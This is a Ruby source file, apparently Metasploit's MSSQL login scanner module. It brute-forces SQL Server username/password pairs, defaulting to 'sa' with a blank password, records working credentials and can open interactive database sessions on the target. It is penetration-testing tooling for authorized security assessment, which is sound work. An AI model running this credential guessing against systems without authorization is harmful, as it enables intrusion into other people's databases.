Path: blob/master/modules/auxiliary/scanner/mssql/mssql_login.rb
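##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mssql'
require 'rex/proto/mssql/client'
require 'rex/post/mssql'

# Credential scanner for Microsoft SQL Server (TDS) logins.
#
# Every username/password pair that authenticates is recorded as a credential
# login in the current workspace. When the MSSQL session feature is enabled and
# `CreateSession` is true, each successful login is additionally wrapped in an
# interactive MSSQL session.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::CommandShell
  include Msf::Auxiliary::Scanner
  include Msf::Sessions::CreateSessionOptions
  include Msf::Auxiliary::ReportSummary

  def initialize
    super(
      'Name' => 'MSSQL Login Utility',
      'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',
      'Author' => 'MC',
      'References' => [
        [ 'CVE', '1999-0506'] # Weak password
      ],
      'License' => MSF_LICENSE,
      # some overrides from authbrute since there is a default username and a blank password
      'DefaultOptions' => {
        'USERNAME' => 'sa',
        'BLANK_PASSWORDS' => true,
        'CreateSession' => false
      }
    )
    register_options([
      Opt::Proxies,
      OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
      OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])
    ])

    # The interactive MSSQL session type is feature-gated. When the feature is
    # off, hide the CreateSession option entirely instead of accepting a value
    # that can never take effect.
    if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
      add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')
    else
      deregister_options('CreateSession')
    end
  end

  # @return [Boolean] whether sessions should be opened for successful logins.
  #   The datastore value is only honoured when the MSSQL session feature is
  #   enabled; otherwise a stale `CreateSession=true` is ignored.
  def create_session?
    return false unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)

    datastore['CreateSession']
  end

  # Runs the per-host scan (via Msf::Auxiliary::Scanner#run) and prints a
  # summary of successful logins and, when applicable, opened sessions.
  #
  # @return the per-host results returned by the scanner; each value is the
  #   hash built by {#run_host} (:successful_logins / :successful_sessions).
  def run
    results = super
    logins = results.flat_map { |_host, host_result| host_result[:successful_logins] }
    sessions = results.flat_map { |_host, host_result| host_result[:successful_sessions] }
    print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")
    return results unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)

    if create_session?
      print_status("#{sessions.size} MSSQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")
    else
      print_status('You can open an MSSQL session with these credentials and %grnCreateSession%clr set to true')
    end
    results
  end

  # Scans a single host with the configured credential collection.
  #
  # @param [String] ip the target address
  # @return [Hash{Symbol => Array}] :successful_logins (scanner results that
  #   authenticated) and :successful_sessions (sessions actually opened; a
  #   login whose session could not be set up is NOT counted here)
  # @raise [Msf::OptionValidateError] when TDSENCRYPTION and CreateSession are
  #   both requested, since session creation over encrypted TDS is unsupported
  def run_host(ip)
    print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")

    if datastore['TDSENCRYPTION']
      # Reject the unsupported combination once, up front, rather than failing
      # on every successful login.
      if create_session?
        raise Msf::OptionValidateError.new(
          {
            'TDSENCRYPTION' => "Cannot create sessions when encryption is enabled. See https://github.com/rapid7/metasploit-framework/issues/18745 to vote for this feature"
          }
        )
      end

      print_status("TDS Encryption enabled")
    end

    cred_collection = build_credential_collection(
      realm: datastore['DOMAIN'],
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    scanner = Metasploit::Framework::LoginScanner::MSSQL.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 30,
        max_send_size: datastore['TCP::max_send_size'],
        send_delay: datastore['TCP::send_delay'],
        auth: datastore['Mssql::Auth'],
        domain_controller_rhost: datastore['DomainControllerRhost'],
        hostname: datastore['Mssql::Rhostname'],
        windows_authentication: datastore['USE_WINDOWS_AUTHENT'],
        tdsencryption: datastore['TDSENCRYPTION'],
        framework: framework,
        framework_module: self,
        # Only keep the authenticated client around when we intend to turn it
        # into a session.
        use_client_as_proof: create_session?,
        ssl: datastore['SSL'],
        ssl_version: datastore['SSLVersion'],
        ssl_verify_mode: datastore['SSLVerifyMode'],
        ssl_cipher: datastore['SSLCipher'],
        local_port: datastore['CPORT'],
        local_host: datastore['CHOST']
      )
    )

    successful_logins = []
    successful_sessions = []
    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      unless result.success?
        invalidate_login(credential_data)
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
        next
      end

      credential_core = create_credential(credential_data)
      credential_data[:core] = credential_core
      create_credential_login(credential_data)
      print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
      successful_logins << result
      next unless create_session?

      begin
        session = session_setup(result)
        if session
          successful_sessions << session
        else
          # session_setup returns nil when the result carries no connection or
          # no client. Previously the nil was appended and counted as an opened
          # session in the summary; report it and release the connection instead.
          print_brute level: :error, ip: ip, msg: 'Failed to setup the session - no connection or client available'
          result.connection.close unless result.connection.nil?
        end
      rescue ::StandardError => e
        elog('Failed to setup the session', error: e)
        print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
        result.connection.close unless result.connection.nil?
      end
    end

    { successful_logins: successful_logins, successful_sessions: successful_sessions }
  end

  # Wraps a successful login's live connection in an interactive MSSQL session.
  #
  # @param [Metasploit::Framework::LoginScanner::Result] result
  # @return [Msf::Sessions::MSSQL, nil] the value returned by start_session,
  #   or nil when the result has no connection or no client (proof)
  def session_setup(result)
    return unless result.connection && result.proof

    mssql_session = Msf::Sessions::MSSQL.new(
      result.connection,
      { client: result.proof, **result.proof.detect_platform_and_arch }
    )
    # Seed the session datastore with the single working pair; the file-based
    # wordlist options are explicitly cleared so they do not carry over.
    session_datastore = {
      'USERPASS_FILE' => nil,
      'USER_FILE' => nil,
      'PASS_FILE' => nil,
      'USERNAME' => result.credential.public,
      'PASSWORD' => result.credential.private
    }

    start_session(self, nil, session_datastore, false, mssql_session.rstream, mssql_session)
  end
end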